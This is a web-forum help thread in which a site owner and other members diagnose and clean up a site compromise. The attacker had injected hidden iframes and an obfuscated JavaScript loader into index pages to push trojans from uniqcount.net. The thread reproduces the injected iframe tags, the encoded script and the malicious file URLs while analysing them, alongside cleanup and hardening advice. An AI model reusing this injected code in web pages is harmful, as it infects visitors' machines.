My Websites Keep Getting A Downloader Virus

[MichelleStillCantType]

Hope this is the right pace to post this and someone can help. I had been running AVG alone until I got a couple of emails letting me know my sites had a virus. One was kind enough to let me know he was running Norton Internet Security. I bought it and sure enough, a downloader.

I can get rid of them for a couple of days by reuploading the index file and sometimes must also upload any php includes used on the index page. It keeps coming back though. My admin says it can't be my server.

Where do they come from, how do I stop them? The only help I get from Norton is how to remove a downloader from a computer. The problem is on my websites. Any help is so much appreciated. I'm lost.

[Webnauts]

Thread moved here in the "Internet Security Discussion Forum".

I hope you will get help here.

[Webnauts]

Quote:

Originally Posted by MichelleStillCantType

Where do they come from, how do I stop them? The only help I get from Norton is how to remove a downloader from a computer. The problem is on my websites. Any help is so much appreciated. I'm lost.

I would take the risk to check, if you would tell your site URL.

[MichelleStillCantType]

Thank you so much. I believe I have them clear again so you should be safe but I can't promise that. Like I said they go away for a bit after I upload a new index file but then they come back out of the blue. It is across my many sites.

www.enjoyportclinton.com
www.thelakeerieguide.com
www.ecampsite.com

there are more, please tell me if you would like the url's

[imvain2]

Well the virus is still there. I'm not sure which image is causing the problem, however the virus is stored in a cursor or animated image of some kind.

Info from the anti virus program that I use

It seems there is another virus that is ran through a WMF (windows meta file - like the ones commonly used in Word)

More info

[stevealmond]

I ran the risk as well, and yes the virus is still there along with the WMF virus.

Your server only serves up what you supply. If what you supply contains a virus, then your server will give it to the web. What you have uploaded to the server therefore must contain the viruses that we have found. So the answer to your question "where do they come from" is your own computer.

As you have recently bought Norton Internet Security I would suggest that you do a full system scan on your own PC using Norton and clear up any problems that are found. You then need to delete all the files from your server. You can do this from control panel if you have one, or by FTP. However it may be best to ask your admin to delete your files for you and reformat your web space, as viruses do have a nack of returning once killed. Then you should have a clean web space, and a clean computer from which to upload your files.

If your own computer doesn't have any problems, then just clean up your web space and upload everything again. If this doesn't cure the problem then you really do have a very weird problem.

Steve

[timmathews.com]

I got it too. I got 2 download viruses. Weird, I use AVG and it caught them. You say your AVG did not? Did you update it?

[visio]

actually I think it is some link you have to http://uniqcount.net/ the virus seems to come from the following two files:
http://uniqcount.net/adv/171/xpl.wmf
http://uniqcount.net/adv/171/count.jar\BlackBox.class

try to find where you link to this people and take off the link, then check again.

[dean]

Looks like this is going around. Check out this thread at Castlecops:
http://www.castlecops.com/t160127-Downloader_Virus.html

[imvain2]

It looks like the uniqcount is being pulled through iframes.

Code:

<iframe src='http://uniqcount.net/adv/new.php?adv=171' width=1 height=1></iframe>

<iframe src='http://uniqcount.net/adv/171/new.php' width=1 height=1></iframe>

What I did was, I used the w3 Validator (http://validator.w3.org/) and clicked the checkbox to view source. This way I can view the source without worrying about the virus. I'm sure there are many ways to accomplis that, but this way worked fine for me.

[imvain2]

Just to see what the website actually looks like, I added uniqcount.net to my hosts file and pointed it at 127.0.0.1. That way any request that my computer makes to retrieve content from uniqcount.net is really looking locally for the files therefor not downloading any virii.

[billa]

Try Windows Defender, which (I think) is still currently a free download.
I had a problem that I could not get rid for ages with different programs and the Defender (or to be accurate, the its older version)finally cracked it.
Amazingly enough, something good seems to have come out of the Microsoft stable...!

[edhan]

Time Module Object Name Threat Action User Information
9/26/2006 16:34:35 PM IMON file http://uniqcount.net/adv/171/sploit.anr Win32/TrojanDownloader.Ani.gen trojan Connection terminated 2765586738\home
9/26/2006 16:34:17 PM IMON archive http://uniqcount.net/adv/171/count.jar Java/ClassLoader.AA trojan Connection terminated 2765586738\home

Well, it is definitely confirmed that http://uniqcount.net has trojan. Remove it and you should be okay.

[wige]

A software program you might want to try is Paros Proxy. This (free) program is a proxy server that you install on your computer, which allows you to view both the requests your web browser is making as well as the responses from the server, see the exact headers, and change or even block requests. I use it mostly to test design changes but for your issue it will help you narrow down why these files are being pushed to the clients. You will be able to use it to block the virus files from downloading as you work to locate the virus.

A few questions I have because you mentioned that it goes away after you run the antivirus: Do you own the server, or is it at your location? Also, if you don't own the server, is it a dedicated or shared server? If you like I could give it a cursory analysis and see if I see anything that looks vulnerable in the site/server itself

[EArmand]

I would deep scan my PC, delete all files from server, change all passwords including your FTP and Hosting Account Passwords and republish clean copy of your website files to your server. I've had something similar to this happen to me and I was able to fix this by deleting the infected files and changing the password to prevent new infected files from being published to my server by the hacker.

[edhan]

Quote:

Originally Posted by EArmand

I would deep scan my PC, delete all files from server, change all passwords including your FTP and Hosting Account Passwords and republish clean copy of your website files to your server. I've had something similar to this happen to me and I was able to fix this by deleting the infected files and changing the password to prevent new infected files from being published to my server by the hacker.

Yes. I do agree with EArmand. That way will be completely eliminated any sign or existence of the worms, trojans or viruses in your server.

[MarkGatESS]

I haven't run into the problem of this virus/trojan myself (so far), but I took precautions by using the link that dean had posted for CastleCops.com and I blocked the IP address range (81.95.144.0 - 81.95.147.255) that I found on the site in our company firewall. Hopefully, this will prevent anything being downloaded to our machines that's causing this problem.

[Orion]

ask your host provider if they have anti-virus solution on their servers. Most shared hosting does not, but they should.
have the host delete the site then recreate it that should get rid of it, provided that the virus hasn't spread to the server, if it is you'll get it back again and your host provider will need to to a full scan and clean on their server(s).

[TrafficProducer]

Quote:

Got a couple of emails letting me know about a Virus

Be careful about emails about Viruses if from an unknown source.

These emails may be:

a) phishing
b) have viruses embeded or link to virus sites.
c) are tring to get you to buy software you may not need.
d) reporting Spoof viruses

[MichelleStillCantType]

I found it! I see the iframe with the http://uniqcount.net/adv/new.php?adv=171 url put into my index.php code. Thank you so much!

So basically this means I can solve the problem somewhat simply right?

Get my ftp username/pass changed and reupload new index files, correct?

Thank you again.

[fbnewtz]

Not only would I change your password for your FTP account, but I would make sure that you do not have any other unknown accounts setup that have FTP access.

I don't know if you have a management panel with your website that allows you to control user/email accounts and potentially make changes to components of your server configuration.

Good luck, and make sure your password is atleast 9 characters and has atleast one upper case letter and a number or symbol.

Fred

[wige]

Do you manage this server yourself or is it run by an outside company? If you own the server, you might want to invest in a vulnerability scanner that searches for and notifies you of possible weaknesses in the server. A free one is called Nessus from nessus.org (what can I say, I love free software) If your server is run by another company, they may knowingly and intentionally add the virus code to the pages they host. I have had it happen in the past with a web host forcing all sites to try to install spyware on visitor computers.

[MichelleStillCantType]

OK here is where I am so far in the event anyone else encounters this problem...

I downloaded an index file from my server and found two things in the code that I didn't put there.

iframe src='http://uniqcount.net/adv/new.php?adv=171' width=1 height=1
iframe src='http://uniqcount.net/adv/171/new.php' width=1 height=1

and the other is a java script...
script language blah blah blah
e = '0x00' + '36';str1 = "%8D%D5%DE%C3%A9%C4%C5%CE%DD%D2%8A%97%C3%DE%C4%DE% D7%DE%DD%DE%C5%CE%8F%D1%DE%D5%D5%D2%DB%97%8B%8D%DE %D3%C7%D6%DA%D2%A9%C4%C7%D4%8A%97%D1%C5%C5%D9%8F%9 8%98%D4%DD%C3%D4%DB%C5%9B%D4%D8%DA%98%D5%DB%C3%84% 98%97%A9%C0%DE%D5%C5%D1%8A%86%A9%D1%D2%DE%D0%D1%C5 %8A%86%8B%8D%98%DE%D3%C7%D6%DA%D2%8B%8D%98%D5%DE%C 3%8B";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);

is the java hiding the wmf? I don't see a wmf anywhere.

I have asked my server admin to change my password and will upload all new files. Probably won't have a definitive answer as to whether this solved the problem for about a week. It took that long for the viruses to come back the first time I uploaded new index files.

The user/pass to my ftp being compromised is making sense. I have only one website with a different ftp login (same server) and it is the only one that has not gotten the virus. Knock on wood.

AVG - I was running AVG free and had it automatically updating and would manually install new versions.

Viruses on my PC - I ran AVG every night. When this problem started I got a trial of McAfee and ran that. Nothing on my PC. I then got a trial of Norton Internet Security and ran that. Nothing on my PC but it was the only one catching the viruses on my sites so I purchased it. I just ran a full scan again and still no viruses found on my computer.

My Server - I lease a dedicated server. I don't know anything about administrating a server so I pay someone monthly to do that. He activitates my domains, adds emails, everything. I have no access to cpanel or plesk and wouldn't know what to do with it if I did. I'm 100% server illiterate beyond ftp'ing. I just design sites.

When I told my server admin what was happening and asked if it was possible the server had a virus his response was...

"It isn't possible for your server to have a virus. It's possible for the files to contain a virus or for the system to be broken into. I do not see signs of it being hacked. I also installed some server virus scanner software and scanned all websites. Below is the information. It did not find any viruses. It's entirely possible that your different computers are infected and you are passing viruses around in your email correspondence."

He attached...
----------- SCAN SUMMARY -----------
Known viruses: 66700
Engine version: 0.88.4
Scanned directories: 2000
Scanned files: 25017
Infected files: 0
Data scanned: 1197.38 MB
Time: 1534.341 sec (25 m 34 s)

On a side note I may have just uploaded all new index files (which always gets rid of the virus for a few days) just b/4 he ran the scan. I honestly can't remember.

I hope I answered everything. I really appreciate all the help.

[wige]

Well, for the javascript, I love how it contains a function called function exploit(). This is from the uniqcount.net server. I looked through the javascript a bit. I am far from being an expert but it looks like these long strings contain code that is supposed to sneak past antivirus programs and force the browser to download files from the other server that contain the virus.

Virus scan would not find the problem, because the virus is not stored on your server. The virus code is being added by tricking the visitor's browser into downloading it from another server.

Your server has a few services running on it, POP3 and SMTP for e-mail (if you don't use this server for e-mail, close these ports) as well as the FTP and Apache servers. Using FTP does present a security risk because no attempt is made to encrypt your password. This puts your communication with the server at risk - anyone can fairly easily read your password. You may want to find out if you can switch to SFTP, which uses a secure certificate to encrypt your communications with the server. Most FTP clients now support this technology.

You seem to be using a log file analysis program called AWStats which is known to allow malicious users to execute commands on your server. It can also be used by remote users to gather information about your users, and may enable a remote user to change files on your server. This is something I would consider a high risk vulnerability. Upgrade to a newer version of the program or disable it as soon as possible.

Your installation of Apache allows diagnostic communications. This can be used to gather information about users in certain cross site scripting attacks. The recommended fix is as follows (requires mod-rewrite):

Code:

RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

The above code should be added to the configuration files for each of your virtual hosts. Also your current configuration makes it possible for users to guess the user names of user accounts on the server. You may want to avoid this by disabling user directories in the Apache configuration file.

Uniqcount.net, where the virus code itself is coming from, does not have much information. You might want to try to contact the owner of that site. Unfortunately, the site seems to be located in Russia, and may be owned by the attacker. I could not find any reliable registration information for the domain name or the IP address except that it is in the Russian Federation. Possibly affiliated with a spam or spyware company.

Quote:

Originally Posted by Your server admin

"It isn't possible for your server to have a virus. It's possible for the files to contain a virus or for the system to be broken into. I do not see signs of it being hacked. I also installed some server virus scanner software and scanned all websites. Below is the information. It did not find any viruses. It's entirely possible that your different computers are infected and you are passing viruses around in your email correspondence."

Which tells me your server admin has never browsed any of your web sites when you advised him/her of the issue. As far as the bit about it not being possible for your server to have a virus, WHAT?!?!?! He/she also says that the websites were scanned, what about the filesystem? There may be a file in the system that notifies the attacker when you change your code, which is how they know to go back and re-add the exploit. Your admin should check the running processes and cron tasks for unauthorized processes.